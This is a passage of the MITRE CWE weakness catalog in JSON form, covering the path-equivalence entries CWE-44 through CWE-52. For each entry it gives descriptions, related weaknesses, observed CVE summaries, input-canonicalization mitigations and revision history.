Equivalence: \'file.name\' (Internal Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of internal dot (\'file.ordir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Internal Dot - \'file.ordir\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Internal Dot - \'file.ordir\'","attr":{"@_Date":"2008-04-11"}}}},"45":{"attr":{"@_ID":"45","@_Name":"Path Equivalence: \'file...name\' (Multiple Internal Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple internal dot (\'file...dir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"44","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"165","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Internal Dot - \'file...dir\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Internal Dot - \'file...dir\'","attr":{"@_Date":"2008-04-11"}}}},"46":{"attr":{"@_ID":"46","@_Name":"Path Equivalence: \'filename \' (Trailing Space)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing space (\'filedir \') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0693","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693"},{"Reference":"CVE-2001-0778","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778"},{"Reference":"CVE-2001-1248","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1248"},{"Reference":"CVE-2004-0280","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280"},{"Reference":"CVE-2004-2213","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213"},{"Reference":"CVE-2005-0622","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0622"},{"Reference":"CVE-2005-1656","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1656"},{"Reference":"CVE-2002-1603","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603"},{"Reference":"CVE-2001-0054","Description":"Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as \\"%20\\"; certain manipulations have unusual side effects.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054"},{"Reference":"CVE-2002-1451","Description":"Trailing space (\\"+\\" in query string) leads to source code disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1451"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Trailing Space - \'filedir \'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"649"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Space - \'filedir \'","attr":{"@_Date":"2008-04-11"}}}},"47":{"attr":{"@_ID":"47","@_Name":"Path Equivalence: \' filename\' (Leading Space)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of leading space (\' filedir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Leading Space - \' filedir\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Path Issue - Leading Space - \' filedir\'","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Equivalence: \' filename (Leading Space)","attr":{"@_Date":"2010-09-27"}}]}},"48":{"attr":{"@_ID":"48","@_Name":"Path Equivalence: \'file name\' (Internal Whitespace)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of internal space (\'file(SPACE)name\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0293","Description":"Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293"},{"Reference":"CVE-2001-1567","Description":"\\"+\\" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1567"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"file(SPACE)name (internal space)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":[{"#text":"This weakness is likely to overlap quoting problems, e.g. the \\"Program Files\\" unquoted search path (CWE-428). It also could be an equivalence issue if filtering removes all extraneous spaces.","attr":{"@_Type":"Relationship"}},{"#text":"Whitespace can be a factor in other weaknesses not directly related to equivalence. It can also be used to spoof icons or hide files with dangerous names (see icon manipulation and visual truncation in CWE-451).","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Internal Space - file(SPACE)name","attr":{"@_Date":"2008-04-11"}}}},"49":{"attr":{"@_ID":"49","@_Name":"Path Equivalence: \'filename/\' (Trailing Slash)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing slash (\'filedir/\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0253","Description":"Overlaps infoleak","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0253"},{"Reference":"CVE-2001-0446","Description":"Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0446"},{"Reference":"CVE-2004-0334","Description":"Bypass Basic Authentication for files using trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0334"},{"Reference":"CVE-2001-0893","Description":"Read sensitive files with trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0893"},{"Reference":"CVE-2001-0892","Description":"Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0892"},{"Reference":"CVE-2004-1814","Description":"Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1814"},{"Reference":"BID:3518","Description":"Source code disclosure","Link":"http://www.securityfocus.com/bid/3518"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"filedir/ (trailing slash, trailing /)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Slash - filedir/","attr":{"@_Date":"2008-04-11"}}}},"50":{"attr":{"@_ID":"50","@_Name":"Path Equivalence: \'//multiple/leading/slash\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple leading slash (\'//multiple/leading/slash\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"161","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1483","Description":"Read files with full pathname using multiple internal slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-1999-1456","Description":"Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1456"},{"Reference":"CVE-2004-0578","Description":"Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0578"},{"Reference":"CVE-2002-0275","Description":"Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0275"},{"Reference":"CVE-2004-1032","Description":"Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1032"},{"Reference":"CVE-2002-1238","Description":"Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1238"},{"Reference":"CVE-2004-1878","Description":"Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1878"},{"Reference":"CVE-2005-1365","Description":"Server allows remote attackers to execute arbitrary commands via a URL with multiple leading \\"/\\" (slash) characters and \\"..\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1365"},{"Reference":"CVE-2000-1050","Description":"Access directory using multiple leading slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1050"},{"Reference":"CVE-2001-1072","Description":"Bypass access restrictions via multiple leading slash, which causes a regular expression to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072"},{"Reference":"CVE-2004-0235","Description":"Archive extracts to arbitrary files using multiple leading slash in filenames in the archive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0235"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"//multiple/leading/slash (\'multiple leading slash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Leading Slash - //multiple/leading/slash","attr":{"@_Date":"2008-04-11"}}}},"51":{"attr":{"@_ID":"51","@_Name":"Path Equivalence: \'/multiple//internal/slash\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple internal slash (\'/multiple//internal/slash/\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1483","Description":"Read files with full pathname using multiple internal slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/multiple//internal/slash (\'multiple internal slash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Internal Slash - /multiple//internal/slash","attr":{"@_Date":"2008-04-11"}}}},"52":{"attr":{"@_ID":"52","@_Name":"Path Equivalence: \'/multiple/trailing/slash//\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple trailing slash (\'/multiple/trailing/slash//\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"163","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1078","Description":"Directory listings in web server using multiple trailing 